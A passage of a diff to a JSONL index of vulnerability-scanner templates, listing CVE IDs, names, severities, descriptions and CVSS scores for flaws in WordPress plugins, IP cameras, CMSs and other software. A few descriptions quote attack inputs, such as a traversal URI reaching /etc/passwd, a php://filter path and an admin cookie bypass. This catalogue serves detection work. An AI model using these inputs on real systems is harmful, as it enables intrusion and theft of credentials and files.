issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-18517.yaml"} +{"ID":"CVE-2017-18518","Info":{"Name":"SMTP by BestWebSoft \u003c 1.1.0 - Cross-Site Scripting","Severity":"medium","Description":"The bws-smtp plugin before 1.1.0 for WordPress has multiple XSS issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-18518.yaml"} +{"ID":"CVE-2017-18527","Info":{"Name":"Pagination by BestWebSoft \u003c 1.0.7 - Cross-Site Scripting","Severity":"medium","Description":"The pagination plugin before 1.0.7 for WordPress has multiple XSS issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-18527.yaml"} +{"ID":"CVE-2017-18528","Info":{"Name":"PDF \u0026 Print by BestWebSoft \u003c 1.9.4 - Cross-Site Scripting","Severity":"medium","Description":"The pdf-print plugin before 1.9.4 for WordPress has multiple XSS issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-18528.yaml"} +{"ID":"CVE-2017-18529","Info":{"Name":"PromoBar by BestWebSoft \u003c 1.1.1 - Cross-Site Scripting","Severity":"medium","Description":"The promobar plugin before 1.1.1 for WordPress has multiple XSS issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-18529.yaml"} +{"ID":"CVE-2017-18530","Info":{"Name":"Rating by BestWebSoft \u003c 0.2 - Cross-Site Scripting","Severity":"medium","Description":"The rating-bws plugin before 0.2 for WordPress has multiple XSS issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-18530.yaml"} +{"ID":"CVE-2017-18532","Info":{"Name":"Realty by BestWebSoft \u003c 1.1.0 - Cross-Site Scripting","Severity":"medium","Description":"The realty plugin before 1.1.0 for WordPress has multiple XSS issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-18532.yaml"} {"ID":"CVE-2017-18536","Info":{"Name":"WordPress Stop User Enumeration \u003c=1.3.7 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Stop User Enumeration 1.3.7 and earlier are vulnerable to unauthenticated reflected cross-site scripting.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-18536.yaml"} +{"ID":"CVE-2017-18537","Info":{"Name":"Visitors Online by BestWebSoft \u003c 1.0.0 - Cross-Site Scripting","Severity":"medium","Description":"The visitors-online plugin before 1.0.0 for WordPress has multiple XSS issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-18537.yaml"} +{"ID":"CVE-2017-18542","Info":{"Name":"Zendesk Help Center by BestWebSoft \u003c 1.0.5 - Cross-Site Scripting","Severity":"medium","Description":"The zendesk-help-center plugin before 1.0.5 for WordPress has multiple XSS issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-18542.yaml"} +{"ID":"CVE-2017-18556","Info":{"Name":"Google Analytics by BestWebSoft \u003c 1.7.1 - Cross-Site Scripting","Severity":"medium","Description":"The bws-google-analytics plugin before 1.7.1 for WordPress has multiple XSS issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-18556.yaml"} +{"ID":"CVE-2017-18557","Info":{"Name":"Google Maps by BestWebSoft \u003c 1.3.6 - Cross-Site Scripting","Severity":"medium","Description":"The bws-google-maps plugin before 1.3.6 for WordPress has multiple XSS issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-18557.yaml"} +{"ID":"CVE-2017-18558","Info":{"Name":"Testimonials by BestWebSoft \u003c 0.1.9 - Cross-Site Scripting","Severity":"medium","Description":"The bws-testimonials plugin before 0.1.9 for WordPress has multiple XSS issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-18558.yaml"} +{"ID":"CVE-2017-18562","Info":{"Name":"Error Log Viewer by BestWebSoft \u003c 1.0.6 - Cross-Site Scripting","Severity":"medium","Description":"The error-log-viewer plugin before 1.0.6 for WordPress has multiple XSS issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-18562.yaml"} +{"ID":"CVE-2017-18564","Info":{"Name":"Sender by BestWebSoft \u003c 1.2.1 - Cross-Site Scripting","Severity":"medium","Description":"The sender plugin before 1.2.1 for WordPress has multiple XSS issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-18564.yaml"} +{"ID":"CVE-2017-18565","Info":{"Name":"Updater by BestWebSoft \u003c 1.35 - Cross-Site Scripting","Severity":"medium","Description":"The updater plugin before 1.35 for WordPress has multiple XSS issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-18565.yaml"} +{"ID":"CVE-2017-18566","Info":{"Name":"User Role by BestWebSoft \u003c 1.5.6 - Cross-Site Scripting","Severity":"medium","Description":"The user-role plugin before 1.5.6 for WordPress has multiple XSS issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-18566.yaml"} {"ID":"CVE-2017-18598","Info":{"Name":"WordPress Qards - Cross-Site Scripting","Severity":"medium","Description":"WordPress Qards through 2017-10-11 contains a cross-site scripting vulnerability via a remote document specified in the URL parameter to html2canvasproxy.php.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-18598.yaml"} {"ID":"CVE-2017-18638","Info":{"Name":"Graphite \u003c=1.1.5 - Server-Side Request Forgery","Severity":"high","Description":"Graphite's send_email in graphite-web/webapp/graphite/composer/views.py in versions up to 1.1.5 is vulnerable to server-side request forgery (SSR)F. The vulnerable SSRF endpoint can be used by an attacker to have the Graphite web server request any resource. The response to this SSRF request is encoded into an image file and then sent to an email address that can be supplied by the attacker. Thus, an attacker can exfiltrate any information.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2017/CVE-2017-18638.yaml"} {"ID":"CVE-2017-3506","Info":{"Name":"Oracle Fusion Middleware Weblogic Server - Remote OS Command Execution","Severity":"high","Description":"The Oracle WebLogic Server component of Oracle Fusion Middleware (Web Services) versions 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2 is susceptible to a difficult to exploit vulnerability that could allow unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server.","Classification":{"CVSSScore":"7.4"}},"file_path":"http/cves/2017/CVE-2017-3506.yaml"} @@ -424,6 +459,8 @@ {"ID":"CVE-2017-7391","Info":{"Name":"Magmi 0.7.22 - Cross-Site Scripting","Severity":"medium","Description":"Magmi 0.7.22 contains a cross-site scripting vulnerability due to insufficient filtration of user-supplied data (prefix) passed to the magmi-git-master/magmi/web/ajax_gettime.php URL.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-7391.yaml"} {"ID":"CVE-2017-7615","Info":{"Name":"MantisBT \u003c=2.30 - Arbitrary Password Reset/Admin Access","Severity":"high","Description":"MantisBT through 2.3.0 allows arbitrary password reset and unauthenticated admin access via an empty confirm_hash value to verify.php.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2017/CVE-2017-7615.yaml"} {"ID":"CVE-2017-7921","Info":{"Name":"Hikvision - Authentication Bypass","Severity":"critical","Description":"Hikvision DS-2CD2xx2F-I Series V5.2.0 build 140721 to V5.4.0 build 160530, DS-2CD2xx0F-I Series V5.2.0 build 140721 to V5.4.0 Build 160401, DS-2CD2xx2FWD Series V5.3.1 build 150410 to V5.4.4 Build 161125, DS-2CD4x2xFWD Series V5.2.0 build 140721 to V5.4.0 Build 160414, DS-2CD4xx5 Series V5.2.0 build 140721 to V5.4.0 Build 160421, DS-2DFx Series V5.2.0 build 140805 to V5.4.5 Build 160928, and DS-2CD63xx Series V5.0.9 build 140305 to V5.3.5 Build 160106 devices contain an improper authentication issue. The improper authentication vulnerability occurs when an application does not adequately or correctly authenticate users. This may allow a malicious user to escalate his or her privileges on the system and gain access to sensitive information.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2017/CVE-2017-7921.yaml"} +{"ID":"CVE-2017-7925","Info":{"Name":"Dahua Security - Configuration File Disclosure","Severity":"critical","Description":"A Password in Configuration File issue was discovered in Dahua DH-IPC-HDBW23A0RN-ZS, DH-IPC-HDBW13A0SN, DH-IPC-HDW1XXX, DH-IPC-HDW2XXX, DH-IPC-HDW4XXX, DH-IPC-HFW1XXX, DH-IPC-HFW2XXX, DH-IPC-HFW4XXX, DH-SD6CXX, DH-NVR1XXX, DH-HCVR4XXX, DH-HCVR5XXX, DHI-HCVR51A04HE-S3, DHI-HCVR51A08HE-S3, and DHI-HCVR58A32S-S2 devices. The password in configuration file vulnerability was identified, which could lead to a malicious user assuming the identity of a privileged user and gaining access to sensitive information.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2017/CVE-2017-7925.yaml"} +{"ID":"CVE-2017-8229","Info":{"Name":"Amcrest IP Camera Web Management - Data Exposure","Severity":"critical","Description":"Amcrest IPM-721S V2.420.AC00.16.R.20160909 devices allow an unauthenticated attacker to download the administrative credentials.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2017/CVE-2017-8229.yaml"} {"ID":"CVE-2017-8917","Info":{"Name":"Joomla! \u003c3.7.1 - SQL Injection","Severity":"critical","Description":"Joomla! before 3.7.1 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2017/CVE-2017-8917.yaml"} {"ID":"CVE-2017-9140","Info":{"Name":"Reflected XSS - Telerik Reporting Module","Severity":"medium","Description":"Cross-site scripting vulnerability in Telerik.ReportViewer.WebForms.dll in Telerik Reporting for ASP.NET WebForms Report Viewer control before R1 2017 SP2 (11.0.17.406) allows remote attackers to inject arbitrary web script or HTML via the bgColor parameter to Telerik.ReportViewer.axd.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-9140.yaml"} {"ID":"CVE-2017-9288","Info":{"Name":"WordPress Raygun4WP \u003c=1.8.0 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Raygun4WP 1.8.0 contains a reflected cross-site scripting vulnerability via sendtesterror.php.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-9288.yaml"} @@ -473,6 +510,7 @@ {"ID":"CVE-2018-12675","Info":{"Name":"SV3C HD Camera L Series - Open Redirect","Severity":"medium","Description":"SV3C HD Camera L Series 2.3.4.2103-S50-NTD-B20170508B and 2.3.4.2103-S50-NTD-B20170823B contains an open redirect vulnerability. It does not perform origin checks on URLs in the camera's web interface, which can be leveraged to send a user to an unexpected endpoint. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2018/CVE-2018-12675.yaml"} {"ID":"CVE-2018-1271","Info":{"Name":"Spring MVC Framework - Local File Inclusion","Severity":"medium","Description":"Spring MVC Framework versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported are vulnerable to local file inclusion because they allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). A malicious user can send a request using a specially crafted URL that can lead a directory traversal attack.","Classification":{"CVSSScore":"5.9"}},"file_path":"http/cves/2018/CVE-2018-1271.yaml"} {"ID":"CVE-2018-1273","Info":{"Name":"Spring Data Commons - Remote Code Execution","Severity":"critical","Description":"Spring Data Commons, versions prior to 1.13 to 1.13.10, 2.0 to 2.0.5,\nand older unsupported versions, contain a property binder vulnerability\ncaused by improper neutralization of special elements.\nAn unauthenticated remote malicious user (or attacker) can supply\nspecially crafted request parameters against Spring Data REST backed HTTP resources\nor using Spring Data's projection-based request payload binding hat can lead to a remote code execution attack.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-1273.yaml"} +{"ID":"CVE-2018-12909","Info":{"Name":"Webgrind \u003c= 1.5 - Local File Inclusion","Severity":"high","Description":"Webgrind 1.5 relies on user input to display a file, which lets anyone view files from the local filesystem (that the webserver user has access to) via an index.php?op=fileviewer\u0026file= URI\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-12909.yaml"} {"ID":"CVE-2018-12998","Info":{"Name":"Zoho manageengine - Cross-Site Scripting","Severity":"medium","Description":"Zoho manageengine is vulnerable to reflected cross-site scripting. This impacts Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 via the parameter 'operation' to /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2018/CVE-2018-12998.yaml"} {"ID":"CVE-2018-1335","Info":{"Name":"Apache Tika \u003c1.1.8- Header Command Injection","Severity":"high","Description":"Apache Tika versions 1.7 to 1.17 allow clients to send carefully crafted headers to tika-server that could be used to inject commands into the command line of the server running tika-server. This vulnerability only affects those running tika-server on a server that is open to untrusted clients.","Classification":{"CVSSScore":"8.1"}},"file_path":"http/cves/2018/CVE-2018-1335.yaml"} {"ID":"CVE-2018-13379","Info":{"Name":"Fortinet FortiOS - Credentials Disclosure","Severity":"critical","Description":"Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests due to improper limitation of a pathname to a restricted directory (path traversal).","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-13379.yaml"} @@ -491,6 +529,7 @@ {"ID":"CVE-2018-15517","Info":{"Name":"D-Link Central WifiManager - Server-Side Request Forgery","Severity":"high","Description":"D-Link Central WifiManager is susceptible to server-side request forgery. The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended to check a connection to an SMTP server but actually allows outbound TCP to any port on any IP address, as demonstrated by an index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ URI. This can undermine accountability of where scan or connections actually came from and or bypass the FW etc. This can be automated via script or using a browser.","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2018/CVE-2018-15517.yaml"} {"ID":"CVE-2018-15535","Info":{"Name":"Responsive FileManager \u003c9.13.4 - Local File Inclusion","Severity":"high","Description":"Responsive FileManager before version 9.13.4 is vulnerable to local file inclusion via filemanager/ajax_calls.php because it uses external input to construct a pathname that should be within a restricted directory, aka local file inclusion.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-15535.yaml"} {"ID":"CVE-2018-15745","Info":{"Name":"Argus Surveillance DVR 4.0.0.0 - Local File Inclusion","Severity":"high","Description":"Argus Surveillance DVR 4.0.0.0 devices allow unauthenticated local file inclusion, leading to file disclosure via a ..%2F in the WEBACCOUNT.CGI RESULTPAGE parameter.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-15745.yaml"} +{"ID":"CVE-2018-15917","Info":{"Name":"Jorani Leave Management System 0.6.5 - Cross-Site Scripting","Severity":"medium","Description":"Persistent cross-site scripting (XSS) issues in Jorani 0.6.5 allow remote attackers to inject arbitrary web script or HTML via the language parameter to session/language.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2018/CVE-2018-15917.yaml"} {"ID":"CVE-2018-15961","Info":{"Name":"Adobe ColdFusion - Unrestricted File Upload Remote Code Execution","Severity":"critical","Description":"Adobe ColdFusion versions July 12 release (2018.0.0.310739), Update 6 and earlier, and Update 14 and earlier have an unrestricted file upload vulnerability. Successful exploitation could lead to arbitrary code execution.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-15961.yaml"} {"ID":"CVE-2018-16059","Info":{"Name":"WirelessHART Fieldgate SWG70 3.0 - Local File Inclusion","Severity":"medium","Description":"WirelessHART Fieldgate SWG70 3.0 is vulnerable to local file inclusion via the fcgi-bin/wgsetcgi filename parameter.","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2018/CVE-2018-16059.yaml"} {"ID":"CVE-2018-16133","Info":{"Name":"Cybrotech CyBroHttpServer 1.0.3 - Local File Inclusion","Severity":"medium","Description":"Cybrotech CyBroHttpServer 1.0.3 is vulnerable to local file inclusion in the URI.","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2018/CVE-2018-16133.yaml"} @@ -509,6 +548,7 @@ {"ID":"CVE-2018-16763","Info":{"Name":"FUEL CMS 1.4.1 - Remote Code Execution","Severity":"critical","Description":"FUEL CMS 1.4.1 allows PHP Code Evaluation via the pages/select/ filter parameter or the preview/ data parameter.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-16763.yaml"} {"ID":"CVE-2018-16836","Info":{"Name":"Rubedo CMS \u003c=3.4.0 - Directory Traversal","Severity":"critical","Description":"Rubedo CMS through 3.4.0 contains a directory traversal vulnerability in the theme component, allowing unauthenticated attackers to read and execute arbitrary files outside of the service root path, as demonstrated by a /theme/default/img/%2e%2e/..//etc/passwd URI.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-16836.yaml"} {"ID":"CVE-2018-16979","Info":{"Name":"Monstra CMS 3.0.4 - HTTP Header Injection","Severity":"medium","Description":"Monstra CMS 3.0.4 is susceptible to HTTP header injection in the plugins/captcha/crypt/cryptographp.php cfg parameter. An attacker can potentially supply invalid input and cause the server to allow redirects to attacker-controlled domains, perform cache poisoning, and/or allow improper access to virtual hosts not intended for this purpose. This is a related issue to CVE-2012-2943.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2018/CVE-2018-16979.yaml"} +{"ID":"CVE-2018-17153","Info":{"Name":"Western Digital MyCloud NAS - Authentication Bypass","Severity":"critical","Description":"It was discovered that the Western Digital My Cloud device before 2.30.196 is affected by an authentication bypass vulnerability. An unauthenticated attacker can exploit this vulnerability to authenticate as an admin user without needing to provide a password, thereby gaining full control of the device. (Whenever an admin logs into My Cloud, a server-side session is created that is bound to the user's IP address. After the session is created, it is possible to call authenticated CGI modules by sending the cookie username=admin in the HTTP request. The invoked CGI will check if a valid session is present and bound to the user's IP address.) It was found that it is possible for an unauthenticated attacker to create a valid session without a login. The network_mgr.cgi CGI module contains a command called \\\"cgi_get_ipv6\\\" that starts an admin session -- tied to the IP address of the user making the request -- if the additional parameter \\\"flag\\\" with the value \\\"1\\\" is provided. Subsequent invocation of commands that would normally require admin privileges now succeed if an attacker sets the username=admin cookie.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-17153.yaml"} {"ID":"CVE-2018-17246","Info":{"Name":"Kibana - Local File Inclusion","Severity":"critical","Description":"Kibana versions before 6.4.3 and 5.6.13 contain an arbitrary file inclusion flaw in the Console plugin. An attacker with access to the Kibana Console API could send a request that will attempt to execute JavaScript which could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-17246.yaml"} {"ID":"CVE-2018-17254","Info":{"Name":"Joomla! JCK Editor SQL Injection","Severity":"critical","Description":"The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-17254.yaml"} {"ID":"CVE-2018-17422","Info":{"Name":"DotCMS \u003c 5.0.2 - Open Redirect","Severity":"medium","Description":"dotCMS before 5.0.2 contains multiple open redirect vulnerabilities via the html/common/forward_js.jsp FORWARD_URL parameter or the html/portlet/ext/common/page_preview_popup.jsp hostname parameter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2018/CVE-2018-17422.yaml"} @@ -521,6 +561,7 @@ {"ID":"CVE-2018-18775","Info":{"Name":"Microstrategy Web 7 - Cross-Site Scripting","Severity":"medium","Description":"Microstrategy Web 7 does not sufficiently encode user-controlled inputs, resulting in cross-site scripting via the Login.asp Msg parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2018/CVE-2018-18775.yaml"} {"ID":"CVE-2018-18777","Info":{"Name":"Microstrategy Web 7 - Local File Inclusion","Severity":"medium","Description":"Microstrategy Web 7 is vulnerable to local file inclusion via \"/WebMstr7/servlet/mstrWeb\" (in the parameter subpage). Remote authenticated users can bypass intended SecurityManager restrictions and list a parent directory via a /.. (slash dot dot) in a pathname used by a web application. NOTE: this is a deprecated product.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2018/CVE-2018-18777.yaml"} {"ID":"CVE-2018-18778","Info":{"Name":"ACME mini_httpd \u003c1.30 - Local File Inclusion","Severity":"medium","Description":"ACME mini_httpd before 1.30 is vulnerable to local file inclusion.","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2018/CVE-2018-18778.yaml"} +{"ID":"CVE-2018-18809","Info":{"Name":"TIBCO JasperReports Library - Directory Traversal","Severity":"medium","Description":"The default server implementation of TIBCO Software Inc.'s TIBCO JasperReports Library, TIBCO JasperReports Library Community Edition, TIBCO JasperReports Library for ActiveMatrix BPM, TIBCO JasperReports Server, TIBCO JasperReports Server Community Edition, TIBCO JasperReports Server for ActiveMatrix BPM, TIBCO Jaspersoft for AWS with Multi-Tenancy, and TIBCO Jaspersoft Reporting and Analytics for AWS contains a directory-traversal vulnerability that may theoretically allow web server users to access contents of the host system.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2018/CVE-2018-18809.yaml"} {"ID":"CVE-2018-18925","Info":{"Name":"Gogs (Go Git Service) 0.11.66 - Remote Code Execution","Severity":"critical","Description":"Gogs 0.11.66 allows remote code execution because it does not properly validate session IDs, as demonstrated by a \"..\" session-file forgery in the file session provider in file.go. This is related to session ID handling in the go-macaron/session code for Macaron.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-18925.yaml"} {"ID":"CVE-2018-19136","Info":{"Name":"DomainMOD 4.11.01 - Cross-Site Scripting","Severity":"medium","Description":"DomainMOD 4.11.01 is vulnerable to reflected cross-site scripting via assets/edit/registrar-account.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2018/CVE-2018-19136.yaml"} {"ID":"CVE-2018-19137","Info":{"Name":"DomainMOD 4.11.01 - Cross-Site Scripting","Severity":"medium","Description":"DomainMOD 4.11.01 is vulnerable to reflected cross-site Scripting via assets/edit/ip-address.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2018/CVE-2018-19137.yaml"} @@ -545,6 +586,7 @@ {"ID":"CVE-2018-20463","Info":{"Name":"WordPress JSmol2WP \u003c=1.07 - Local File Inclusion","Severity":"high","Description":"WordPress JSmol2WP plugin 1.07 is susceptible to local file inclusion via ../ directory traversal in query=php://filter/resource= in the jsmol.php query string. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. This can also be exploited for server-side request forgery.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-20463.yaml"} {"ID":"CVE-2018-20470","Info":{"Name":"Tyto Sahi pro 7.x/8.x - Local File Inclusion","Severity":"high","Description":"Tyto Sahi Pro versions through 7.x.x and 8.0.0 are susceptible to a local file inclusion vulnerability in the web reports module which can allow an outside attacker to view contents of sensitive files.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-20470.yaml"} {"ID":"CVE-2018-20526","Info":{"Name":"Roxy Fileman 1.4.5 - Unrestricted File Upload","Severity":"critical","Description":"Roxy Fileman 1.4.5 is susceptible to unrestricted file upload via upload.php. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-20526.yaml"} +{"ID":"CVE-2018-20608","Info":{"Name":"Imcat 4.4 - Phpinfo Configuration","Severity":"high","Description":"Imcat 4.4 allows remote attackers to read phpinfo output via the root/tools/adbug/binfo.php?phpinfo1 URI.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-20608.yaml"} {"ID":"CVE-2018-20824","Info":{"Name":"Atlassian Jira WallboardServlet \u003c7.13.1 - Cross-Site Scripting","Severity":"medium","Description":"The WallboardServlet resource in Jira before version 7.13.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross-site scripting vulnerability in the cyclePeriod parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2018/CVE-2018-20824.yaml"} {"ID":"CVE-2018-20985","Info":{"Name":"WordPress Payeezy Pay \u003c=2.97 - Local File Inclusion","Severity":"critical","Description":"WordPress Plugin WP Payeezy Pay is prone to a local file inclusion vulnerability because it fails to sufficiently verify user-supplied input. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. WordPress Plugin WP Payeezy Pay version 2.97 is vulnerable; prior versions are also affected.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-20985.yaml"} {"ID":"CVE-2018-2392","Info":{"Name":"SAP Internet Graphics Server (IGS) - XML External Entity Injection","Severity":"high","Description":"SAP Internet Graphics Servers (IGS) running versions 7.20, 7.20EXT, 7.45, 7.49, or 7.53 has two XML external entity injection (XXE) vulnerabilities within the XMLCHART page - CVE-2018-2392 and CVE-2018-2393. These vulnerabilities occur due to a lack of appropriate validation on the Extension HTML tag when submitting a POST request to the XMLCHART page to generate a new chart.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-2392.yaml"} @@ -565,11 +607,13 @@ {"ID":"CVE-2018-6530","Info":{"Name":"D-Link - Unauthenticated Remote Code Execution","Severity":"critical","Description":"OS command injection vulnerability in soap.cgi (soapcgi_main in cgibin) in D-Link DIR-880L DIR-880L_REVA_FIRMWARE_PATCH_1.08B04 and previous versions, DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-65L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to execute arbitrary OS commands via the service parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-6530.yaml"} {"ID":"CVE-2018-6910","Info":{"Name":"DedeCMS 5.7 - Path Disclosure","Severity":"high","Description":"DedeCMS 5.7 allows remote attackers to discover the full path via a direct request for include/downmix.inc.php or inc/inc_archives_functions.php","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-6910.yaml"} {"ID":"CVE-2018-7251","Info":{"Name":"Anchor CMS 0.12.3 - Error Log Exposure","Severity":"critical","Description":"Anchor CMS 0.12.3 is susceptible to an error log exposure vulnerability due to an issue in config/error.php. The error log is exposed at an errors.log URI, and contains MySQL credentials if a MySQL error (such as \"Too many connections\") has occurred.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-7251.yaml"} +{"ID":"CVE-2018-7282","Info":{"Name":"TITool PrintMonitor - Blind SQL Injection","Severity":"critical","Description":"The username parameter of the TITool PrintMonitor solution during the login request is vulnerable to and/or time-based blind SQLi.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-7282.yaml"} {"ID":"CVE-2018-7422","Info":{"Name":"WordPress Site Editor \u003c=1.1.1 - Local File Inclusion","Severity":"high","Description":"WordPress Site Editor through 1.1.1 allows remote attackers to retrieve arbitrary files via the ajax_path parameter to editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-7422.yaml"} {"ID":"CVE-2018-7467","Info":{"Name":"AxxonSoft Axxon Next - Local File Inclusion","Severity":"high","Description":"AxxonSoft Axxon Next suffers from a local file inclusion vulnerability.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-7467.yaml"} {"ID":"CVE-2018-7490","Info":{"Name":"uWSGI PHP Plugin Local File Inclusion","Severity":"high","Description":"uWSGI PHP Plugin before 2.0.17 mishandles a DOCUMENT_ROOT check during use of the --php-docroot option, making it susceptible to local file inclusion.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-7490.yaml"} {"ID":"CVE-2018-7600","Info":{"Name":"Drupal - Remote Code Execution","Severity":"critical","Description":"Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-7600.yaml"} {"ID":"CVE-2018-7602","Info":{"Name":"Drupal - Remote Code Execution","Severity":"critical","Description":"Drupal 7.x and 8.x contain a remote code execution vulnerability that exists within multiple subsystems. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-7602.yaml"} +{"ID":"CVE-2018-7653","Info":{"Name":"YzmCMS v3.6 - Cross-Site Scripting","Severity":"medium","Description":"In YzmCMS 3.6, index.php has XSS via the a, c, or m parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2018/CVE-2018-7653.yaml"} 